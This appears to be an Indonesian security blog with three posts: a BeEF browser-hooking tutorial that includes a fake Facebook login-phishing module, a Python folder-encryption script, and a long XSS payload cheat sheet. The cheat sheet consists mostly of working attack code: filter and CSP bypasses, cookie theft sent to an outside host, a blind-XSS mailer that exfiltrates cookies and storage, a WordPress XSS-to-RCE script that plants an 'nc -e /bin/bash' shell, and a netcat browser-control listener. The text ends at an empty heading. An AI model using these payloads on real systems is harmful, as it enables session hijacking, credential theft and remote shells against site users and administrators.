Xyber Note

Mengenal BeEF Framework

2023-03-26T10:06:00.001-07:00

BeEF adalah singkatan dari Browser Exploitation Framework. Alat ini dirancang untuk mengeksplorasi kerentanan di browser dan mengujinya.

Peretasan BeEF melibatkan dan mengaitkan satu atau lebih browser web dan menggunakannya untuk meluncurkan modul perintah untuk menyerang sistem target di dalam browser.

BeEF bekerja dengan menggunakan file JavaScript bernama hook.js. Tugas penyerang adalah menemukan cara untuk menjalankan JavaScript ini di browser korban.

Setelah dijalankan, dia akan memiliki kendali atas browser mereka dalam berbagai aspek. Ada banyak cara dia bisa mengeksekusi skrip ini. Misalnya, dia dapat membuat halaman phishing dengan pengaitkannya di dalam kode HTML

Kali ini Saya akan mencontohkan dengan menggunakan halam phishing. Untuk tahap awal mari terlebih dahulu menginstall BeEF.

Install BeEF Framework

OS Linux diperlukan untuk menginstal BeEF di mesin lokal Anda. Anda dapat langsung menginstal paket dengan perintah berikut:

apt install beef-xss

Gunakan perintah berikut untuk menjalankan BeEF:

beef-xss

[22:07:06][*] BeEF is loading. Wait a few seconds... [22:07:09][*] 8 extensions enabled: [22:07:09] | Proxy [22:07:09] | Demos [22:07:09] | XSSRays [22:07:09] | Events [22:07:09] | Admin UI [22:07:09] | Social Engineering [22:07:09] | Network [22:07:09] |_ Requester [22:07:09][*] 303 modules enabled. [22:07:09][*] 1 network interfaces were detected. [22:07:09][*] running on network interface: [22:07:09] | Hook URL: http://127.0.0.1:3000/hook.js [22:07:09] |_ UI URL: http://127.0.0.1:3000/ui/panel [22:07:09][*] RESTful API key: 43f6880f37e0c0b41b1e98935862bb2cf6a63266 [22:07:09][!] [GeoIP] Could not find MaxMind GeoIP database: [22:07:09] |_ Run geoipupdate to install [22:07:09][*] HTTP Proxy: http://127.0.0.1:6789 [22:07:09][*] BeEF server started (press control+c to stop)

Disini kita bisa melihat ada dua link penting, yaitu:

Hook URL: http://127.0.0.1:3000/hook.js
UI URL: http://127.0.0.1:3000/ui/panel

"Hook URL" adalah JavaScript yang diperlukan untuk dijalankan korban Anda.

"UI URL" adalah antarmuka web untuk BeEF tempat Anda dapat memantau dan melakukan serangan.

Anda dapat mengakses antarmuka web BeEF dengan mengetikkan URL berikut di browser web Anda:

http://127.0.0.1:3000/ui/panel

Secara default username nya adalah beef dan password beef

Setelah berhasil masuk, Anda akan melihat halaman "Getting Started" dengan informasi tentang cara kerja BeEF. Dari sini Anda dapat melihat browser yang hacked/hooked baik online maupun offline.

Kaitkan Browser Target

Agar browser web menjadi "hook", Anda memerlukan klien untuk mengunjungi situs web dengan file JavaScript "hook.js".

Jadi, untuk mendemonstrasikan ini saya akan membuat halaman HTML yang sangat dasar untuk memuat file JavaScript. Ini dapat ditempatkan di server web, diletakkan di server file, dikirim melalui email ke seseorang, dll.

< html >
< head >
< script src = "http://127.0.0.1:3000/hook.js" type = 'text/javascript' > </ script >
</ head >
< body >
Your browser is hooked!
</body> </html> _
_ _ _

Seperti yang Anda lihat, browser online baru telah ditambahkan ke bagian browser terkait.

Sekarang saya memiliki browser yang terhubung, saya dapat menjalankan beberapa modul bawaan dari tab "Perintah/Commands".

Serangan Phishing

Untuk melakukan serangan phishing dasar, buka Commands > Social Engineering > Pretty Theft di antarmuka web BeEF.

Klik pada tombol Execute.

Ini akan menyebabkan halaman batas waktu sesi Facebook palsu muncul di halaman web korban, meminta kredensial pengguna.

Dan kemudian Saya akan memasukkan beberapa kredensial palsu.

Seperti yang Anda lihat “test@zyx” dan “p@ssw0rd” was recorded!

Jadi, BeEF adalah alat yang ampuh untuk mengeksploitasi browser web, dan ini adalah contoh mengapa Anda tidak boleh mengeklik tautan yang mencurigakan. Selain itu, Anda harus sangat berhati-hati dengan apa pun yang muncul di browser Anda.

Informasi ini hanya boleh digunakan untuk memperluas pengetahuan dan bukan untuk menyebabkan serangan berbahaya atau merusak.

Python Folder Decryption & Encryption

2023-03-19T09:38:00.003-07:00

Halo, ini adalah kode yang sangat berguna untuk mendekripsi dan mengenkripsi folder demi keamanan, Anda dapat menggunakan kode ini untuk mengenkripsi data Anda

pip install cryptography

import base64

from cryptography.hazmat.backends import default_backend

from cryptography.hazmat.primitives import hashes

from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

from cryptography.fernet import Fernet

from cryptography.fernet import InvalidToken

import os



def encrypt_folder(folder, password):

    salt = os.urandom(16)

    kdf = PBKDF2HMAC(

        algorithm=hashes.SHA256,

        iterations=100000,

        salt=salt,

        length=32,

        backend=default_backend()

    )

    key = base64.urlsafe_b64encode(kdf.derive(password))

    fernet = Fernet(key)

    for root, dirs, files in os.walk(folder):

        for filename in files:

            file_path = os.path.join(root, filename)

            with open(file_path, "rb") as file:

                data = file.read()

            encrypted_data = fernet.encrypt(data)

            with open(file_path, "wb") as file:

                file.write(encrypted_data)

    with open("salt.bin", "wb") as f:

        f.write(salt)



def decrypt_folder(folder, password):

    try:

        with open("salt.bin", "rb") as f:

            salt = f.read()

        kdf = PBKDF2HMAC(

            algorithm=hashes.SHA256,

            iterations=100000,

            salt=salt,

            length=32,

            backend=default_backend()

        )

        key = base64.urlsafe_b64encode(kdf.derive(password))

        fernet = Fernet(key)



        for root, dirs, files in os.walk(folder):

            for filename in files:

                file_path = os.path.join(root, filename)

                with open(file_path, "rb") as file:

                    data = file.read()

                decrypted_data = fernet.decrypt(data)

                with open(file_path, "wb") as file:

                    file.write(decrypted_data)



    except InvalidToken:

        print("Error: Invalid password")

    else:

        print("Decryption complete!")







print("Welcome to the folder encryption/decryption program!")

print("1. Encrypt folder")

print("2. Decrypt folder")



choice = input("Enter your choice: ")



if choice == "1":

    folder = input("Enter the folder path: ")

    password = input("Enter the password: ").encode()

    encrypt_folder(folder, password)

    print("Encryption complete!")



elif choice == "2":

    folder = input("Enter the folder path: ")

    password = input("Enter the password: ").encode()

    decrypt_folder(folder, password)





else:

    print("Invalid choice!")

Mengenal Serangan Cross Site Scripting [XSS]

2023-03-14T09:08:00.377-07:00

Apa itu Cross Site Scripting (XSS)?

XSS terjadi ketika penyerang mengelabui aplikasi web agar mengirimkan data dalam bentuk yang dapat dijalankan oleh browser pengguna. Paling umum, ini adalah kombinasi dari HTML dan XSS yang disediakan oleh penyerang, tetapi XSS juga dapat digunakan untuk mengirimkan unduhan, plugin, atau konten media yang berbahaya. Penyerang dapat mengelabui aplikasi web dengan cara ini ketika aplikasi web mengizinkan data dari sumber yang tidak tepercaya — seperti data yang dimasukkan dalam formulir oleh pengguna atau diteruskan ke titik akhir API oleh perangkat lunak klien — untuk ditampilkan kepada pengguna tanpa lolos dengan benar .

Karena XSS dapat mengizinkan pengguna yang tidak tepercaya untuk mengeksekusi kode di browser pengguna tepercaya dan mengakses beberapa jenis data, seperti cookie sesi, kerentanan XSS memungkinkan penyerang mengambil data dari pengguna dan secara dinamis memasukkannya ke halaman web dan mengambil kendali situs atau aplikasi jika pengguna administratif atau istimewa menjadi sasaran.

Konten berbahaya yang dikirimkan melalui XSS dapat ditampilkan secara instan atau setiap kali halaman dimuat atau acara tertentu dilakukan. Serangan XSS bertujuan untuk menargetkan pengguna aplikasi web, dan mungkin sangat efektif karena muncul di dalam situs tepercaya.

Saya sangat berharap ini menjadi bahan konsultasi yang mudah diikuti untuk sebagian besar terkait XSS.

Konteks HTML – Injeksi Tag Sederhana

Gunakan saat masukan berada di dalam nilai atribut dari tag HTML atau di luar tag kecuali yang dijelaskan dalam kasus berikutnya.

<svg onload=alert(1)>
"><svg onload=alert(1)>

Konteks HTML – Dalam Injeksi Tag Blok

Gunakan saat input mendarat di dalam atau di antara pembukaan/penutupan tag berikut:

<title><style><script><textarea><noscript><pre><xmp> dan <iframe> (</tag> adalah

sesuai).

</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>

Konteks HTML – Injeksi Sebaris

Gunakan saat input berada di dalam nilai atribut dari tag HTML tetapi tag tersebut tidak dapat

diakhiri dengan tanda lebih besar dari (>).

"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//

Konteks HTML – Injeksi Sumber

Gunakan saat input mendarat sebagai nilai dari atribut tag HTML berikut: href, src, data atau

action (juga formaction). Untuk src dalam tag skrip, gunakan panggilan skrip eksternal (URL) atau

“data:,alert(1)”. Payload ke-2 di bawah peringatan di luar konteks target untuk browser Webkit.

javascript:alert(1)
data:text/html,<svg onload=alert(1)>

Konteks Javascript – Injeksi Kode

Gunakan saat input mendarat di blok skrip, di dalam nilai yang dibatasi string.

'-alert(1)-'
'-alert(1)//

Konteks Javascript – Injeksi Kode dengan Escape Bypass

Gunakan saat input mendarat di blok skrip, di dalam nilai yang dibatasi string tetapi tanda kutip diloloskan oleh garis miring terbalik.

\'-alert(1)//

Konteks Javascript – Injeksi Kode di Blok Logis

Gunakan muatan ke-1 atau ke-2 saat input mendarat di blok skrip, di dalam nilai yang dibatasi string, dan di dalam blok logis tunggal seperti fungsi atau kondisional (jika, lainnya, dll). Jika kutipan lolos dengan garis miring terbalik, gunakan muatan ke-3.

'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

Konteks Javascript – Injeksi Tag

Gunakan saat input mendarat di mana saja di blok skrip.

</script><svg onload=alert(1)>

Advanced

Refleksi Multi – Refleksi Ganda (Masukan Tunggal)

Gunakan untuk memanfaatkan beberapa pantulan pada halaman yang sama.

'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*

Refleksi Multi – Refleksi Tiga Kali (Masukan Tunggal)

Gunakan untuk memanfaatkan beberapa pantulan pada halaman yang sama.

*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='

Refleksi Multi Input (Ganda & Tiga)

Gunakan untuk memanfaatkan beberapa pantulan masukan pada halaman yang sama.

p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>

Injeksi Pengunggahan File – Nama file

Gunakan saat nama file yang diunggah tercermin di suatu tempat di halaman target.

"><svg onload=alert(1)>.gif

Injeksi Pengunggahan File – Metadata

Gunakan ketika metadata file yang diunggah tercermin di suatu tempat di halaman target. Itu menggunakan baris perintah exiftool dan bidang metadata apa pun dapat diatur.

hacker@inthehouse:~$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg

Injeksi Pengunggahan File – File SVG

Gunakan untuk membuat XSS yang tersimpan sesuai target saat mengunggah file gambar. Simpan konten di bawah sebagai "xss.svg".

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>

Injeksi Sisipkan DOM

Gunakan untuk menguji XSS saat injeksi dimasukkan ke dalam DOM sebagai markup yang valid alih-alih tercermin dalam kode sumber. Ini berfungsi untuk kasus di mana tag skrip dan vektor lainnya tidak berfungsi.

<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>

Injeksi Sisipkan DOM – Permintaan Sumber Daya

Gunakan saat kode javascript halaman menyisipkan ke halaman hasil permintaan ke URL

yang dikendalikan oleh penyerang (injeksi).

data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>

Injeksi PHP_SELF

Gunakan ketika URL saat ini digunakan oleh kode PHP yang mendasari target sebagai nilai atribut dari

formulir HTML, misalnya. Menyuntikkan antara ekstensi php dan memulai bagian kueri (?) menggunakan garis miring (/).

https://hackerinthehouse.in/xss.php/"><svg onload=alert(1)>?a=reader

Injeksi Skrip – Tanpa Penutupan

Gunakan ketika ada tag skrip penutup (</script>) di suatu tempat di kode setelah refleksi.

<script src=data:,alert(1)>
<script src=//hackerinthehouse.in/1.js>

Javascript postMessage() Injeksi DOM (dengan Iframe)

Gunakan saat ada event listener “message” seperti di “window.addEventListener('message',

…)” dalam kode javascript tanpa memeriksa asal. Target harus bisa dibingkai (

header X-Frame Options sesuai konteks). Simpan sebagai file HTML (atau menggunakan data:teks/html) dengan menyediakan TARGET_URL dan INJEKSI (vektor atau payload XSS).

<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">

XSS berbasis XML

Gunakan untuk menyuntikkan vektor XSS di halaman XML (tipe konten teks/xml atau aplikasi/xml).

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//hackerinthehouse.in/1.js"/>

Injeksi Templat Sisi Klien

Gunakan untuk menguji injeksi template sisi klien (berguna untuk injeksi AngularJS di bawah). Itu harus mengembalikan 1024 saat merender.

{{32*32}}

Injeksi AngularJS (v1.6 dan lebih tinggi)

Gunakan ketika ada perpustakaan AngularJS dimuat di halaman, di dalam blok HTML dengan

direktif ng-app atau buat milik Anda sendiri.

{{constructor.constructor('alert(1)')()}}
<x ng-app>{{constructor.constructor('alert(1)')()}}

Injeksi CRLF

Gunakan saat aplikasi merefleksikan input di salah satu header respons, memungkinkan injeksi

karakter Carriage Return (%0D) dan Line Feed (%0A). Vektor untuk Tokek dan Webkit,

masing-masing.

%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A
%3Cscript%3Ealert(1)%3C/script%3E
%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection
%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E

Lewati Filter

Campuran Kasus XSS

Gunakan untuk mengabaikan filter peka huruf besar/kecil.

<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>

Tag Tidak Tertutup

Gunakan dalam injeksi HTML untuk menghindari pemfilteran berdasarkan adanya tanda lebih rendah dari (<) dan lebih besar dari (>). Ini membutuhkan kode sumber asli yang lebih besar dari tanda masuk setelah refleksi masukan.

<svg onload=alert(1)//
<svg onload="alert(1)"

XSS huruf besar

Gunakan saat aplikasi mencerminkan input dalam huruf besar.

<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
<SCRIPT SRC=//HACKERINTHEHOUSE.IN/1></SCRIPT>

Konten Ekstra untuk Tag Skrip

Gunakan saat filter mencari “<script>” atau “<script src=…” dengan beberapa variasi tetapi tanpa

memeriksa atribut lain yang tidak dibutuhkan.

<script/x>alert(1)</script>

XSS Bersandi Ganda

Gunakan saat aplikasi melakukan decoding input ganda.

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

Lansiran tanpa Tanda Kurung (Hanya String)

Gunakan dalam vektor HTML atau injeksi javascript ketika tanda kurung tidak diperbolehkan dan

kotak peringatan sederhana sudah cukup.

alert`1`

Lansiran tanpa tanda kurung

Gunakan dalam vektor HTML atau injeksi javascript ketika tanda kurung tidak diizinkan dan PoC

perlu mengembalikan info target apa pun.

setInterval`alert\x28document.domain\x29`
setTimeout`alert\x28document.domain\x29`

Lansiran tanpa tanda kurung (Tag Eksklusif)

Gunakan hanya dalam injeksi HTML jika tanda kurung tidak diperbolehkan. Ganti “&” dengan “%26” di URL.

<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#40;1&#41>

Lansiran tanpa Karakter Abjad

Gunakan saat karakter alfabet tidak diperbolehkan. Berikut adalah waspada(1).

[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()

Kebingungan Peringatan

Gunakan untuk mengelabui beberapa filter ekspresi reguler (regex). Ini mungkin digabungkan dengan

alternatif sebelumnya (di atas). Opsi terpendek "top" juga dapat diganti dengan "window", "parent",

"self" atau "this" tergantung pada konteksnya.

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)

Injeksi Pengunggahan File – Penyamaran GIF HTML/js

Gunakan untuk melewati CSP melalui unggahan file. Simpan semua konten di bawah sebagai "xss.gif" atau "xss.js" (untuk pemeriksaan MIME yang ketat). Itu dapat diimpor ke halaman target dengan <link rel=import href=xss.gif> (juga “xss.js”) atau <script src=xss.js></script>. Ini gambar/gif untuk PHP.

GIF89a=//<script>
alert(1)//</script>;

Lompat ke Fragmen URL

Gunakan saat Anda perlu menyembunyikan beberapa karakter dari payload Anda yang akan memicu WAF misalnya. Itu menggunakan format payload masing-masing setelah fragmen URL (#).

eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
* (Webkit only)
<svg/onload=innerHTML=location.hash> #<img/src/onerror=alert(1)>

Pemisah Alternatif HTML

Gunakan saat spasi default tidak diizinkan. Garis miring dan tanda kutip (tunggal atau ganda) mungkin

juga disandikan URL (masing-masing %2F, %27 dan %22), sedangkan tanda plus (+) hanya dapat digunakan di URL. Skema Tag:

<name [1] attrib [2] = [3] value [4] handler [5] = [6] js [7]>
[1], [2], [5] => %09, %0A, %0C, %0D, %20, / and +
[3] & [4] => %09, %0A, %0C, %0D, %20, + and ' or " in both
[6] & [7] => %09, %0A, %0B, %0C, %0D, %20, /, + and ' or " in both

Bypass Berbasis Tag Strip

Gunakan saat filter menghapus apa pun di antara karakter < dan >. Injeksi inline saja.

"o<x>nmouseover=alert<x>(1)//
"autof<x>ocus o<x>nfocus=alert<x>(1)//

Injeksi XSS Orde Kedua

Gunakan saat input Anda akan digunakan dua kali, seperti disimpan dinormalisasi dalam database dan kemudian diambil untuk digunakan nanti atau dimasukkan ke dalam DOM.

&lt;svg/onload&equals;alert(1)&gt;

Bypass Asal Peristiwa untuk postMessage() XSS

Gunakan saat pemeriksaan asal dapat dilewati dalam kode target javascript dengan menambahkan salah satu asal yang diizinkan sebagai subdomain dari domain penyerang yang akan mengirim muatan.

Contoh memanfaatkan skrip Crosspwn (tersedia di bagian Miscellaneous) di localhost.

http://facebook.com.localhost/crosspwn.php?
target=//hackerinthehouse.in/tests/status.html&msg=<script>alert(1)</script>

Bypass CSP (untuk Google Domains yang Dimasukkan ke Daftar Putih)

Gunakan jika ada CSP (Content-Security Policy) yang mengizinkan eksekusi dari domain ini.

<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);>
</script>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js></script><x 
ng-app ng-csp>{{constructor.constructor('alert(1)')()}}

Vektor tanpa Event Handler

Gunakan sebagai alternatif untuk penangan acara, jika tidak diizinkan. Beberapa memerlukan interaksi pengguna sebagaimana dinyatakan dalam vektor itu sendiri (juga bagian darinya).

<script>alert(1)</script>
<script src=data:,alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click

Vektor dengan Penangan Peristiwa Agnostik

Gunakan vektor berikut jika semua nama tag HTML yang dikenal tidak diizinkan. Karakter atau string abjad apa pun dapat digunakan sebagai nama tag sebagai pengganti "x". Mereka membutuhkan interaksi pengguna seperti yang dinyatakan oleh konten teks mereka sendiri (yang juga menjadi bagian dari vektor).

<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!

Komentar Alternatif Javascript

Gunakan ketika komentar javascript biasa (garis miring ganda) tidak diperbolehkan, lolos atau dihapus.

<!--
%0A-->

Eksploitasi

Panggilan Skrip Jarak Jauh

Gunakan saat Anda perlu memanggil skrip eksternal tetapi vektor XSS Anda berbasis penangan

(seperti <svg onload=) atau dalam injeksi javascript. Domain "brutelogic.com.br" bersama dengan

file HTML dan js digunakan sebagai contoh.

1. Berbasis HTML (respons harus berupa HTML dengan

header Access-Control-Allow-Origin (CORS))

"var x=new XMLHttpRequest();x.open('GET','//hackerinthehouse.in/0.php');x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"

fetch('//hackerinthehouse.in/0.php').then(function(r){r.text().then(function(w) {write(w)})})

* (with fully loaded JQuery library)
$.get('//hackerinthehouse.in/0.php',function(r){write(r)})

2. Berbasis Javascript (respon harus javascript)

with(document)body.appendChild(createElement('script')).src='//hackerinthehouse.in/2.js'
* (with fully loaded JQuery library)
$.getScript('//hackerinthehouse.in/2.js')

WordPress XSS ke RCE (hingga v4.9.1)

Gunakan itu sebagai skrip jarak jauh untuk dijalankan ketika admin WordPress mendapatkan XSS dengan pendengar seperti netcat di port 5855. Plugin "Hello Dolly" adalah targetnya di sini, tetapi hampir semua plugin lain dapat digunakan, mengubah file dan jalur yang sesuai.

p = '/wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
s = '<?=`nc localhost 5855 -e /bin/bash`;';
a = new XMLHttpRequest();
a.open('GET', p+q, 0);
a.send();
$ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] +
'&newcontent=' + s + '&action=update&' + q;
b = new XMLHttpRequest();
b.open('POST', p+q, 1);
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
b.onreadystatechange = function(){
if (this.readyState == 4) {
fetch('/wordpress/wp-content/plugins/hello.php');
}
}

Blind Mailer XSS

Gunakan itu sebagai skrip jarak jauh XSS buta yang disimpan sebagai file PHP dan ubah $to dan $headers vars sesuai. Server email yang berfungsi harus ada.

<?php header("Content-type: application/javascript"); ?>


var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] .
$_SERVER["REQUEST_URI"] ?>';


var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' +
document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE
COOKIES\n' + document.cookie;
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) +
'\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;


var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
r.send('origin=' + document.location.origin + '&msg=' +
encodeURIComponent(msg));


<?php
header("Access-Control-Allow-Origin: " . $_POST["origin"]);
$origin = $_POST["origin"];
$to = "myName@myDomain";
$subject = "XSS Blind Report for " . $origin;
$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: ".
$_SERVER["HTTP_X_FORWARDED_FOR"];
$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $_POST["msg"];
$headers = "From: report@myDomain" . "\r\n";
if ($origin && $msg) {
mail($to, $subject, $msg, $headers);
}
?>

Penyematan XSS Asing Tak Terlihat

Gunakan untuk memuat XSS dari domain lain (atau subdomain) ke domain saat ini. Dibatasi oleh

header X-Frame-Options (XFO) target. Contoh di bawah lansiran dalam konteks brutelogic.com.br

terlepas dari domainnya.

<iframe src="//hackerinthehouse.in/xss.php?a=<svg onload=alert(document.domain)>"
style=display:none></iframe>

Pencurian kue

Gunakan untuk mendapatkan semua cookie dari pengguna korban yang ditetapkan oleh situs target. Cookie tidak dapat dilindungi oleh bendera keamanan httpOnly.

fetch('//hackerinthehouse.in/?c='+document.cookie)

Deface Virtual Sederhana

Gunakan untuk mengubah tampilan situs kepada korban yang menyediakan kode HTML. Pada contoh di bawah ini, pesan “Tidak Ditemukan” ditampilkan.

<svg onload="documentElement.innerHTML='<h1>Not Found</h1>'">

Kontrol Jarak Jauh Peramban

Gunakan untuk menghubungkan browser dan mengirim perintah javascript ke sana secara interaktif. Gunakan kode javascript di bawah ini alih-alih alert(1) dalam injeksi Anda dengan terminal mirip Unix yang terbuka dengan skrip shell (pendengar) berikut. Berikan HOST sebagai nama host, alamat IP, atau domain untuk menerima perintah dari mesin penyerang.

Javascript:

setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:5855'},100)

Listener

hacker@inthehouse:~$ while :; do printf "j$ "; read c; echo $c | nc -lp 5855 >/dev/null; done

Ragam

Halaman Tes Online XSS

Gunakan untuk berlatih vektor dan muatan XSS. Periksa kode sumber untuk titik injeksi.

https://hackerinthehouse.in/xss.php

Injeksi HTML Sadar-Filter Multi-Kasus

Gunakan sebagai sekali pakai untuk mendapatkan tingkat keberhasilan XSS yang lebih tinggi.

'"</Script><Html /Onmouseover=(alert)(1) //

Penundaan Eksekusi Javascript

Gunakan ketika perpustakaan javascript atau sumber daya lain yang diperlukan untuk injeksi tidak dimuat sepenuhnya dalam pelaksanaan payload. Panggilan eksternal berbasis JQuery digunakan sebagai contoh.

onload=function(){$.getScript('//hackerinthehouse.in/2.js')}
onload=x=>$.getScript('//hackerinthehouse.in/2.js')

Sumber yang Valid untuk Tag Gambar

Gunakan saat Anda membutuhkan atribut src yang valid untuk memicu peristiwa pemuatan alih-alih kesalahan.

<imgsrc=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAAC
ADs=onload=alert(1)>

XSS terpendek

Gunakan ketika Anda memiliki slot terbatas untuk injeksi. Membutuhkan skrip asli (

sudah ada dalam kode sumber) dipanggil dengan jalur relatif ditempatkan setelah injeksi mendarat. Server penyerang harus membalas dengan skrip penyerang untuk permintaan persis yang dilakukan oleh skrip asli (jalur yang sama) atau dalam halaman 404 default (lebih mudah). Semakin pendek domain, semakin baik.

<base href=//knoxss.me>

Mobile-only Event Handlers

Gunakan saat menargetkan aplikasi seluler.

<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<body onorientationchange=alert(1)>

Body Tag

Kumpulan vektor tubuh. Yang terakhir hanya berfungsi untuk browser Microsoft.

<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=%23x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1!

Vektor XSS yang Kurang Dikenal

Kumpulan vektor XSS yang kurang dikenal.

<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

Cross-Origin Script (Crosspwn)

Simpan konten di bawah ini sebagai file .php dan gunakan sebagai berikut:

http://facebook.com.localhost/crosspwn.php?
target=//hackerinthehouse.in/tests/status.html&msg=<script>peringatan(document.domain)

Di mana "facebook.com" adalah asal yang diizinkan dan "localhost" menyerang domain, "//hackerinthehouse.in/tests/status.html" adalah halaman target dan

"<script>alert(document.domain)" adalah pesan yang dikirim.

Penggunaan lainnya adalah untuk mengaktifkan onresize dan onhashchange body event handler tanpa

interaksi pengguna:

http://localhost/crosspwn.php?target=//hackerinthehouse.in/xss.php?
a=<body/onresize=alert(document.domain)>

Dan untuk mempersingkat dan menyembunyikan muatan yang disuntikkan, bidang tambahan "nama" dapat digunakan.

http://localhost/crosspwn.php?target=//hackerinthehouse.in/xss.php?
a=<svg/onload=eval(name)>&name=alert(document.domain)

Code:
<!DOCTYPE html>
<body onload="crossPwn()">
<h2>CrossPwn</h2>
<iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>"
name="<?php echo $_GET['name'] ?>" height="0"
style="visibility:hidden"></iframe>
<script>
function crossPwn() {
frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage
document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); //
onresize
document.getElementsByTagName('iframe')[0].src = '<?php echo
$_GET["target"] ?>' + '#brute'; // onhashchange
}
</script>
</body>
</html>

Skrip XSS Finder Sederhana untuk PHP (Analisis Statis)

Gunakan untuk menemukan potensi kelemahan XSS dalam kode sumber PHP. Untuk sistem mirip Unix: simpan konten di bawah, izinkan eksekusi dan jalankan dengan ./filename. Ini berfungsi untuk file tunggal dan rekursif (folder dan sub-folder).

if [ -z $1 ]
then
echo -e "Usage:\n$0 FILE\n$0 -r FOLDER"
exit
else
f=$1
fi

sources=(GET POST REQUEST "SERVER\['PHP" "SERVER\['PATH_" "SERVER\
['REQUEST_U")
sinks=(? echo die print printf print_r var_dump)

xssam(){
for i in ${sources[@]}
do
a=$(grep -in "\$_${i}" $f | grep -o "\$.*=" | sed "s/[ ]\?=//g" | sort -u)
for j in ${sinks[@]}
do
grep --color -in "${j}.*\$_${i}" $f
for k in $a
do
grep --color -in "${j}.*$k" $f
done
done
done
}
if [ $f != "-r" ]
then
xssam
else
for i in $(find $2 -type f -name "*.php")

do
echo "File: $i"
f=$i
xssam
done
fi

Node.js RCE

